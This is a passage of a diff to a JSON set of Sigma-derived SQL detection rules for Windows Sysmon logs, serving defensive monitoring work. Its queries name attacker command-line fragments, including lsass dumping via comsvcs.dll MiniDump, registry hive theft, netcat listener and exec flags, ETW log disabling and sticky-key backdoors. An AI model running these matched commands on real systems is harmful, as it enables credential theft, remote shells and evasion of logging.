LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? 
\\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects 
actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE 
'%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage 
LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and 
SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND 
CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": 
"45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' 
OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE 
'\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE 
'%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 